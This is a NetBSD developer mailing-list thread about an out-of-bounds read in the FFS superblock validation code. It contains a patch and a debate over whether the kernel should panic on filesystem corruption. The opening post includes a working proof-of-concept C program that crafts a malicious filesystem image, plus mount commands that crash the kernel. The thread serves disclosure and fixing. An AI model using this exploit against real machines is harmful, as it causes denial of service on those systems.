Discussion:
FFS: wrong superblock check ~> crash
Maxime Villard
2014-10-20 13:38:11 UTC
Permalink
Probably with the conviction that I would find some bugs, I opened
ffs/ffs_vfsops.c, and something immediately struck me:

918 error = bread(devvp, sblock_try[i] / DEV_BSIZE, SBLOCKSIZE, cred,
919 0, &bp);

SBLOCKSIZE (= 8192) bytes are read from the disk and put into bp->b_data
(an allocated buffer).

924 fs = (struct fs*)bp->b_data;
...
939 sbsize = fs->fs_sbsize;


'sbsize' is set to a value that was read from the disk.

976 /* Validate size of superblock */
977 if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
978 continue;

Basic sanity checks. MAXBSIZE = 64 * 1024.

991 fs = kmem_alloc((u_long)sbsize, KM_SLEEP);
992 memcpy(fs, bp->b_data, sbsize);

And then comes this memcpy. The problem here is that the size of b_data
is 8192 bytes, but the check above allows sbsize anywhere in [1376; 65536]
(sizeof(struct fs) up to MAXBSIZE).

With a broken superblock the kernel will read far beyond the allocated
area, which usually means it will crash.
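
To make the arithmetic concrete, here is a small standalone sketch of
the same pattern (userland only, constants inlined; 1376 stands in for
sizeof(struct fs) on UFS1):

#include <stdio.h>

#define SBLOCKSIZE 8192
#define MAXBSIZE (64 * 1024)
#define MINSBSIZE 1376		/* sizeof(struct fs), UFS1 */

int main(void) {
	unsigned sbsize = MAXBSIZE - 1;	/* attacker-chosen fs_sbsize */

	/* The current check: passes for any sbsize in [1376; 65536]. */
	if (sbsize > MAXBSIZE || sbsize < MINSBSIZE)
		return 1;

	/* But the buffer filled by bread() holds only SBLOCKSIZE bytes. */
	if (sbsize > SBLOCKSIZE)
		printf("memcpy would read %u bytes past the %u-byte buffer\n",
		    sbsize - SBLOCKSIZE, (unsigned)SBLOCKSIZE);
	return 0;
}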

Exploit:

------------------------------ ffs.c ------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <ufs/ffs/fs.h>

#ifndef MAXBSIZE
#define MAXBSIZE (64 * 1024)
#endif

int main(void) {
	struct fs fs;
	char byte[65536] = "";
	FILE *f;

	/* Forge a superblock whose claimed size passes the old
	 * "sbsize > MAXBSIZE" check but far exceeds SBLOCKSIZE. */
	memset(&fs, 0, sizeof(fs));
	fs.fs_magic = FS_UFS1_MAGIC;
	fs.fs_sbsize = MAXBSIZE - 1;
	fs.fs_bsize = MAXBSIZE - 1;
	fs.fs_sblockloc = 1024;

	/* Write the bogus superblock, then pad the image with zeros. */
	f = fopen("ffs.img", "w");
	if (f == NULL)
		return 1;
	fwrite(&fs, sizeof(fs), 1, f);
	fwrite(&byte, 1, 65536 - sizeof(fs), f);
	fclose(f);
	return 0;
}

# ./ffs
# vnconfig vnd0d ffs.img
# mount /dev/vnd0d /mnt
-> crash
-------------------------------------------------------------------

I think the sanity check should be:

Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;

/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;

/* Check that we can handle the file system blocksize */

Tested on NetBSD-current: no longer crashes.

Ok/Comments?
J. Hannken-Illjes
2014-10-20 15:19:11 UTC
Permalink
Post by Maxime Villard
Probably with the conviction that I would find some bugs, I opened ffs/ffs_vfsops.c
<snip>
Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?
Looks ok.

--
J. Hannken-Illjes - ***@eis.cs.tu-bs.de - TU Braunschweig (Germany)
Manuel Bouyer
2014-10-20 15:46:06 UTC
Permalink
Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 years of experience will always make the difference
--
Taylor R Campbell
2014-10-20 15:58:45 UTC
Permalink
Date: Mon, 20 Oct 2014 17:46:06 +0200
From: Manuel Bouyer <***@antioche.eu.org>

Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.

Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
Manuel Bouyer
2014-10-20 16:18:51 UTC
Permalink
Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
Definitely not. I want a panic. If the filesystem is corrupted, something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicking (e.g.
an NFS server).
--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 years of experience will always make the difference
--
Greg Troxel
2014-10-20 17:10:58 UTC
Permalink
Post by Manuel Bouyer
Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
Definitely not. I want a panic. If the filesystem is corrupted, something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicking (e.g.
an NFS server).
The basic issue here is that there are two use cases:

The FFS file system in question is /, or /usr, or something else that
the operator deems Wicked Important.

The FFS file system is on some random removable media that someone just
wants to access.

The desires, while each is reasonable, are totally different.

I would suggest a new filesystem option (perhaps "poe" for panic on
error, with a nod to Dr. Strangelove) that causes detection of
consistency errors to panic rather than return an error. Then people
can turn it on for filesystems that are so critical that they prefer a
panic.
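
For the flavor of it, a sketch of how an error site might consult such
a flag (a userland mock; MNT_PANICONERROR and the struct are made up
for illustration, not existing NetBSD interfaces):

#include <err.h>
#include <errno.h>
#include <stdio.h>

#define MNT_PANICONERROR 0x1		/* hypothetical "poe" mount flag */

struct mount { int mnt_flag; };		/* mock of the kernel structure */

/* Stand-in for the kernel's panic(). */
static void panic(const char *msg) { errx(1, "panic: %s", msg); }

/* What a consistency-error site could do under the "poe" proposal. */
static int
ffs_inconsistency(struct mount *mp, const char *msg)
{
	if (mp->mnt_flag & MNT_PANICONERROR)
		panic(msg);
	fprintf(stderr, "ffs: %s, returning error\n", msg);
	return EINVAL;
}

int main(void) {
	struct mount m = { 0 };		/* "poe" not set: error, no panic */
	(void)ffs_inconsistency(&m, "superblock size out of range");
	return 0;
}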
Manuel Bouyer
2014-10-20 17:34:07 UTC
Permalink
Post by Greg Troxel
[...]
The FFS file system in question is /, or /usr, or something else that
the operator deems Wicked Important.
The FFS file system is on some random removable media that someone just
wants to access.
For random removable media, the only reasonable way to access it is
from a non-root userland process :) Or in a single-use virtual machine.

Maybe we should run the USB stack in a non-root userland too, BTW.
--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 years of experience will always make the difference
--
Manuel Bouyer
2014-10-20 17:27:37 UTC
Permalink
I disagree.
There's a principle of networking product design, which is that you are never allowed to crash due to external input. If you receive an invalid packet, you can complain about it and say the sender is broken, but if you crash from it it's always your bug, no excuses, no exceptions.
I agree.
I would treat all external inputs that way; storage is an external input.
No, for most server usage it's internal input. You don't plug random
USB keys into your servers, do you? And even if I have ffs on
USB keys, I don't consider them external, as I use them only on
my own systems.
Panics are for INTERNAL consistency failures, for example a state machine that gets into a non-existent state. But any objection to outside data must be a rejection of that data, nothing more.
I agree. And if the kernel detects an inconsistent ffs state, it's either
because it did write bogus data to the disk (in which case you can consider
that the kernel itself is in an inconsistent state) or because the
hardware is bogus (in which case a panic is also not that silly).

Remounting a filesystem read-only on a running server is certainly the
worst way of dealing with the problem.
--
Manuel Bouyer, LIP6, Universite Paris VI. ***@lip6.fr
Tel: 01 44 27 70 14 Fax: 01 44 27 72 80
--
P***@Dell.com
2014-10-20 16:57:19 UTC
Permalink
Post by Manuel Bouyer
Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
Definitely not. I want a panic. If the filesystem is corrupted, something
has gone really wrong and you can't trust the running system any more.
And there are cases where returning EROFS is worse than panicking (e.g.
an NFS server).
I disagree.

There’s a principle of networking product design, which is that you are never allowed to crash due to external input. If you receive an invalid packet, you can complain about it and say the sender is broken, but if you crash from it it’s always your bug, no excuses, no exceptions.

I would treat all external inputs that way; storage is an external input. Panics are for INTERNAL consistency failures, for example a state machine that gets into a non-existent state. But any objection to outside data must be a rejection of that data, nothing more.

(The root file system might be a corner case. But non-root file systems, no.)

paul
Mindaugas Rasiukevicius
2014-10-20 18:48:31 UTC
Permalink
Post by Manuel Bouyer
Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There are lots of other ways to crash the kernel with a broken
ffs. In this specific case it's OK to return an error, but in the
general case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue running
with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
Definitely not. I want a panic. If the filesystem is corrupted,
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicking (e.g. an NFS server).
Disagree. The kernel should remount the file system in read-only mode.

Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash. The system should clearly indicate
the errors to the user and be defensive (hence remount in read-only),
but if I insert a USB stick with garbage on it and my system crashes then
it is a plain bug with potential security implications.
--
Mindaugas
Manuel Bouyer
2014-10-20 18:57:06 UTC
Permalink
Post by Mindaugas Rasiukevicius
Post by Manuel Bouyer
Definitely not. I want a panic. If the filesystem is corrupted,
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicking (e.g. an NFS server).
Disagree. The kernel should remount the file system in read-only mode.
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.
I do; it's the only sane thing to do if the system wrote bogus
data to the disk and noticed it later. Remounting in read-only mode
on a server with active services running doesn't do anything good
(I know because Linux servers do this. A panic and reboot is a much
better behavior).

If the corrupted filesystem is from a corrupted USB key then not panicking
is probably better; but 1) USB keys usually don't have ffs on them, and 2)
in such a case it would be better to run the filesystem code in userland anyway.

Now if the behavior can be chosen at compile or run time I'm happy with
it, but there needs to be a way to keep the current behavior.
--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 years of experience will always make the difference
--
Mindaugas Rasiukevicius
2014-10-20 19:44:21 UTC
Permalink
Post by Manuel Bouyer
Post by Mindaugas Rasiukevicius
Post by Manuel Bouyer
Definitely not. I want a panic. If the filesystem is corrupted,
something has gone really wrong and you can't trust the running system
any more. And there are cases where returning EROFS is worse than
panicking (e.g. an NFS server).
Disagree. The kernel should remount the file system in read-only mode.
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.
I do; it's the only sane thing to do if the system wrote bogus
data to the disk and noticed it later. Remounting in read-only mode
on a server with active services running doesn't do anything good
(I know because Linux servers do this. A panic and reboot is a much
better behavior).
Huh? If your use case is a single / partition for everything then sure.
I can actually extend my statement: the system should crash neither
in the case of a corrupt file system nor in the case of a disk failure
(which may or may not lead to a corrupt file system).

If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy; it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable? In
many cases this is suitable and desirable; consider distributed systems
(you have redundancy) or caches (where I can just discard the corrupted
data segment and refetch it from the origin). Meanwhile, I can replace
the failed disk and/or rebuild the corrupt file system while experiencing
only a limited disruption.
Post by Manuel Bouyer
If the corrupted filesystem is from a corrupted USB key then not panicking
is probably better; but 1) USB keys usually don't have ffs on them, and 2)
in such a case it would be better to run the filesystem code in userland anyway.
So now you make an assumption about file systems used on USB sticks?
That does not matter. Somebody can create a USB stick with a manually
handcrafted superblock to crash your machine or maybe even exploit it.
To me, that constitutes a security vulnerability.
--
Mindaugas
Manuel Bouyer
2014-10-20 20:10:43 UTC
Permalink
Post by Mindaugas Rasiukevicius
Huh? If your use case is a single / partition for everything then sure.
I don't, but other use cases are equally important.
Post by Mindaugas Rasiukevicius
I can actually extend my statement: the system should crash neither
in the case of a corrupt file system nor in the case of a disk failure
(which may or may not lead to a corrupt file system).
Detectable disk failures are handled by RAID in my context.
But I've also got the case of disks that would silently corrupt data.
In this case you want to stop operations ASAP because if you keep things
running you only make things worse (corrupting good data on other members
of the RAID).
Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;
As they would if the partition they're working on suddenly becomes read-only.
It may be less damaging to stop the server, even if only one of the
many partitions is affected (and if you have that many partitions,
maybe you should also have more servers).
Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable? In
many cases this is suitable and desirable; consider distributed systems
(you have redundancy)
Then you can take the system down, no problem. It's probably even better
to take it down completely than to let it run in degraded mode.
Post by Mindaugas Rasiukevicius
or caches (where I can just discard the corrupted
data segment and refetch it from the origin).
How can the cache know where the corruption comes from?

Anyway, I can't see existing software that could deal gracefully with the
filesystem it's working on becoming unavailable. Remounting read-only
is the default Linux behavior and I've been hit by this many times.
Not only was the server unavailable to users, but it created
other problems (like mails bouncing, NFS operations failing instead
of just waiting for the server to come back, etc.) while the server ran
in degraded mode before someone could stop it.
Post by Mindaugas Rasiukevicius
Meanwhile, I can replace
the failed disk and/or rebuild the corrupt file system while experiencing
only a limited disruption.
Post by Manuel Bouyer
If the corrupted filesystem is from a corrupted USB key then not panicking
is probably better; but 1) USB keys usually don't have ffs on them, and 2)
in such a case it would be better to run the filesystem code in userland anyway.
So now you make an assumption about file systems used on USB sticks?
That does not matter. Somebody can create a USB stick with a manually
handcrafted superblock to crash your machine or maybe even exploit it.
To me, that constitutes a security vulnerability.
Of course he can. He can also change the firmware of the USB stick
for this purpose. That's why untrusted USB sticks should not be mounted
using the in-kernel filesystems (but the USB stack may be a problem too).
--
Manuel Bouyer <***@antioche.eu.org>
NetBSD: 26 years of experience will always make the difference
--
Michael van Elst
2014-10-20 22:18:17 UTC
Permalink
Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;
When a single node going down makes people unhappy, you may want to have
more than one :)
Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable?
It all depends on what you can or are willing to handle, and also on
what a crash (and reboot) would actually solve. It doesn't help if your
boot partition is damaged and you force a reboot, converting a
maybe-half-working system into a dead system.

In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error, and the best way to recover is to
panic (and throw the data away; the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out whether the data you can read
is complete or correct.

Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.

Your workstation or laptop usually has different requirements.
Mindaugas Rasiukevicius
2014-10-20 23:13:19 UTC
Permalink
Post by Michael van Elst
Post by Mindaugas Rasiukevicius
If I have a system with an array of disks and one of them fails, a crash
would take down the whole node. When many terabytes of data suddenly
disappear people get unhappy;
When a single node going down makes people unhappy, you may want to have
more than one :)
There are convergence and recovery times which may have an extra cost
for you. Sure, the failure of a single node might merely result in an
increased latency somewhere. However, there can be a significant
difference between recovering the whole node and just replacing/recovering
one segment of data in it. That is especially the case with caches:
you do not want to randomly blow them away and refill them - it takes some time.
Post by Michael van Elst
Post by Mindaugas Rasiukevicius
it usually costs quite a bit of money too.
So, how about making only the *failed* segment of data unavailable?
It all depends on what you can or are willing to handle, and also on
what a crash (and reboot) would actually solve. It doesn't help if your
boot partition is damaged and you force a reboot, converting a
maybe-half-working system into a dead system.
Not really relevant to my example, where you would have dedicated disks
for the data, but I think we agree on this - there are different use
cases and it depends. If the boot partition is damaged, then it does
indeed most likely mean that the system is not in a state where it
can do its job. I would probably still just remount the file system
read-only and let it fail elsewhere, but it may as well panic; at
this point it is non-functioning and requires manual intervention anyway.
Post by Michael van Elst
In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error, and the best way to recover is to
panic (and throw the data away; the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out whether the data you can read
is complete or correct.
Why not? It seems to be a question of how you communicate the errors
back to the applications or administrator. There are applications which
gracefully handle EIOs exactly for this purpose. The fact that they are
very rare does not mean they do not exist. :)
Post by Michael van Elst
Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.
It really depends on the application or service; you often have to make
design considerations for both, though.
--
Mindaugas
Michael van Elst
2014-10-21 05:45:03 UTC
Permalink
Post by Mindaugas Rasiukevicius
Post by Michael van Elst
In my use case, a broken filesystem is usually a sign of an unnoticed
hardware or software error, and the best way to recover is to
panic (and throw the data away; the machines have only temporary
data). Continuing with a read-only filesystem doesn't do any good,
because you have no means to find out whether the data you can read
is complete or correct.
Why not? It seems to be a question of how you communicate the errors
back to the applications or administrator. There are applications which
gracefully handle EIOs exactly for this purpose. The fact that they are
very rare does not mean they do not exist. :)
See, that's what "in my use case" means.
Post by Mindaugas Rasiukevicius
Post by Michael van Elst
Most clustered systems also handle complete outages better than
a degraded mode. That's why you have things like STONITH.
It really depends on the application or service; you often have to make
design considerations for both, though.
That was the point, there is no definitive solution. You, as an
administrator, need to choose.
Martin Husemann
2014-10-20 19:10:02 UTC
Permalink
Post by Mindaugas Rasiukevicius
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.
Please raise your hand if you did NOT use "mount -o rump"
when mounting such a disk the last time on NetBSD - anyone?

Martin
Greg Troxel
2014-10-20 19:25:00 UTC
Permalink
Post by Martin Husemann
Post by Mindaugas Rasiukevicius
Perhaps we can debate what to do with corrupted / when the system is
booting, but for other cases (especially hot-plug or external disks)
I certainly do not expect a crash.
Please raise your hand if you did NOT use "mount -o rump"
when mounting such a disk the last time on NetBSD - anyone?
That certainly is the best practice, but it's a bug if not using rump
leads to trouble.
Michael van Elst
2014-10-20 21:59:40 UTC
Permalink
Post by Manuel Bouyer
Definitely not. I want a panic.
Definitely an administrative decision then. You could make it a
mount option :)
matthew green
2014-10-21 00:44:18 UTC
Permalink
Post by Michael van Elst
Post by Manuel Bouyer
Definitely not. I want a panic.
Definitely an administrative decision then. You could make it a
mount option :)
indeed.

istr that solaris has "onerror=<panic|remount|unmount|...?>" option.


.mrg.
Stephan
2014-10-21 05:29:28 UTC
Permalink
Yes, you can configure that on a zpool:

failmode YES wait | continue | panic

This is relevant for SAN disks, for instance, where you don't
necessarily want to crash the server when a disk becomes temporarily
unavailable.
Post by matthew green
Post by Michael van Elst
Post by Manuel Bouyer
Definitely not. I want a panic.
Definitely an administrative decision then. You could make it a
mount option :)
indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.
.mrg.
Michael van Elst
2014-10-21 05:47:11 UTC
Permalink
Post by matthew green
Post by Michael van Elst
Post by Manuel Bouyer
Definitely not. I want a panic.
Definitely an administrative decision then. You could make it a
mount option :)
indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.
Same for Linux.

But before you can make it a mount option, the filesystem code
must be able to handle those cases without panicking :)
matthew green
2014-10-21 05:57:03 UTC
Permalink
Post by Michael van Elst
Post by matthew green
Post by Michael van Elst
Definitely an administrative decision then. You could make it a
mount option :)
indeed.
istr that solaris has "onerror=<panic|remount|unmount|...?>" option.
Same for Linux.
But before you can make it a mount option, the filesystem code
must be able to handle those cases without panicking :)
minor details... ;)
David Holland
2014-10-21 06:31:03 UTC
Permalink
Post by Michael van Elst
But before you can make it a mount option, the filesystem code
must be able to handle those cases without panicking :)
...which isn't going to happen real soon. It gets "interesting".
--
David A. Holland
***@netbsd.org
Christos Zoulas
2014-10-20 16:53:59 UTC
Permalink
Post by Taylor R Campbell
Date: Mon, 20 Oct 2014 17:46:06 +0200
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
This is wishful thinking (unless we fix the current set of bugs
that prevent us from doing so even on a healthy filesystem, for example
PR/30525). I would be happy if we could isolate the broken filesystem
from all I/O operations instead of crashing.

There are many different recipes in which file descriptors kept open
for R/W corrupt the filesystem during R/O downgrades.

christos
Taylor R Campbell
2014-10-20 22:12:04 UTC
Permalink
Date: Mon, 20 Oct 2014 16:53:59 +0000 (UTC)
Post by Taylor R Campbell
Continuing to run with a bogus file system is no good, but panicking
the kernel is worse. If the kernel takes any drastic action beyond
merely returning an error, it should remount the file system
read-only.
This is wishful thinking (unless we fix the current set of bugs
that prevent us from doing so even on a healthy filesystem, for example
PR/30525). I would be happy if we could isolate the broken filesystem
from all I/O operations instead of crashing.

Yes -- I meant that as a long-term (medium-term?) goal, not as
something we can just do right now.
Christos Zoulas
2014-10-20 16:46:23 UTC
Permalink
Post by Manuel Bouyer
Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Well, this was the mentality 30 years ago (let's panic), and this is why
we are here today. Sure, it is fine and safe to panic(), but if I can
prevent the whole system from crashing and keep running in degraded
mode (isolating the broken filesystem), I'd rather have the choice to do
so. I.e., the best thing would be to choose the panic-or-isolate behavior
via a sysctl or a compile-time kernel define.
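
As a sketch of what that choice could look like (illustrative names
only; neither the define nor such a sysctl exists in the tree today):

#include <stdio.h>
#include <stdlib.h>

/* Compile-time default, imagined as overridable at run time through
 * a sysctl that would export ffs_panic_on_error. */
#ifdef FFS_PANIC_ON_ERROR
static int ffs_panic_on_error = 1;
#else
static int ffs_panic_on_error = 0;
#endif

static void
ffs_handle_inconsistency(const char *msg)
{
	if (ffs_panic_on_error) {
		fprintf(stderr, "panic: ffs: %s\n", msg);
		abort();	/* stands in for the kernel's panic() */
	}
	fprintf(stderr, "ffs: %s: isolating the filesystem\n", msg);
}

int main(void) {
	ffs_handle_inconsistency("bad superblock");
	return 0;
}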

christos
Masao Uebayashi
2014-10-20 18:22:47 UTC
Permalink
Post by Christos Zoulas
Post by Manuel Bouyer
Post by Maxime Villard
[...]
With a broken superblock the kernel will read far beyond the allocated
area, which mostly means it will crash.
Sure. There are lots of other ways to crash the kernel with a broken ffs.
In this specific case it's OK to return an error, but in the general
case I prefer to have the kernel panic when an inconsistency is
detected in ffs, rather than return an error and try to continue
running with a bogus filesystem.
Well, this was the mentality 30 years ago (let's panic), and this is why
we are here today. Sure, it is fine and safe to panic(), but if I can
prevent the whole system from crashing and keep running in degraded
mode (isolating the broken filesystem), I'd rather have the choice to do
so. I.e., the best thing would be to choose the panic-or-isolate behavior
via a sysctl or a compile-time kernel define.
Have you heard of MINIX 3?

:)
David Holland
2014-10-20 16:23:58 UTC
Permalink
Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?
I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.

I'm not sure what gets put in sbsize in such cases; if it's always
SBLOCKSIZE, then we should probably reject anything that isn't exactly
SBLOCKSIZE and forget about slop or hypothetical compatibility with
larger superblocks. If it's the block size of the block the superblock
is in, though, then there should be a test like this.
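
In code, the clamping variant could read roughly like this (a sketch
against the excerpt quoted above, not a tested patch; MIN is the usual
sys/param.h macro):

#include <stdio.h>

#define SBLOCKSIZE 8192

/* Keep the existing range check on sbsize, but never copy more than
 * bread() actually put into the buffer. At the copy site this would be
 * memcpy(fs, bp->b_data, MIN(sbsize, SBLOCKSIZE)) instead of
 * memcpy(fs, bp->b_data, sbsize). */
int main(void) {
	unsigned sbsize = 65535;	/* bogus on-disk value */
	unsigned copysize = sbsize < SBLOCKSIZE ? sbsize : SBLOCKSIZE;

	printf("would copy %u bytes instead of %u\n", copysize, sbsize);
	return 0;
}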

Another semi-related thing to check, btw: does it invalidate the
buffers for candidate superblocks that it reads and then rejects? Failure
to do this when the volume blocksize isn't SBLOCKSIZE (since it seems
to always read buffers of size SBLOCKSIZE here) might cause
interesting overlapping buffer lossage later.
--
David A. Holland
***@netbsd.org
Maxime Villard
2014-10-20 16:48:37 UTC
Permalink
Post by David Holland
Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?
I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.
Yes, that's what I thought at first, but I saw a comment in ffs/fs.h about this:

"In all cases the size of the superblock will be SBLOCKSIZE."
Maxime Villard
2014-10-21 07:27:46 UTC
Permalink
Post by Maxime Villard
Post by David Holland
Post by Maxime Villard
Index: ffs_vfsops.c
===================================================================
RCS file: /cvsroot/src/sys/ufs/ffs/ffs_vfsops.c,v
retrieving revision 1.299
diff -u -r1.299 ffs_vfsops.c
--- ffs_vfsops.c 24 May 2014 16:34:04 -0000 1.299
+++ ffs_vfsops.c 20 Oct 2014 13:01:46 -0000
@@ -974,7 +974,7 @@
continue;
/* Validate size of superblock */
- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))
continue;
/* Check that we can handle the file system blocksize */
Tested on NetBSD-current: no longer crashes.
Ok/Comments?
I think the check should be left alone, but afterwards the value
should be clamped to the amount of data that can actually be
transferred. Otherwise I think it may break, e.g. on volumes with odd
block sizes.
"In all cases the size of the superblock will be SBLOCKSIZE."
I think changing

- if (sbsize > MAXBSIZE || sbsize < sizeof(struct fs))
+ if (sbsize > SBLOCKSIZE || sbsize < sizeof(struct fs))

is ok. The kernel will behave randomly if sbsize > 8192, and this bug has
been here since the initial revision (20 years ago); if there were really
strange filesystems in the wild, they would have triggered a panic, and we
would have ended up knowing about it.

This patch simply makes the kernel return an error instead of behaving
randomly, with no implementation change. It is the least intrusive fix.

And from a more or less official specification:

http://www.phptr.com/content/images/0131482092/samplechapter/mcdougall_ch15.pdf

Page 11:
"The primary super-block starts at an offset of 8192 bytes into the partition
slice and occupies one file system block (usually 8192 bytes, but can be 4096
bytes on x86 architectures)."

So 8192 should be fine.
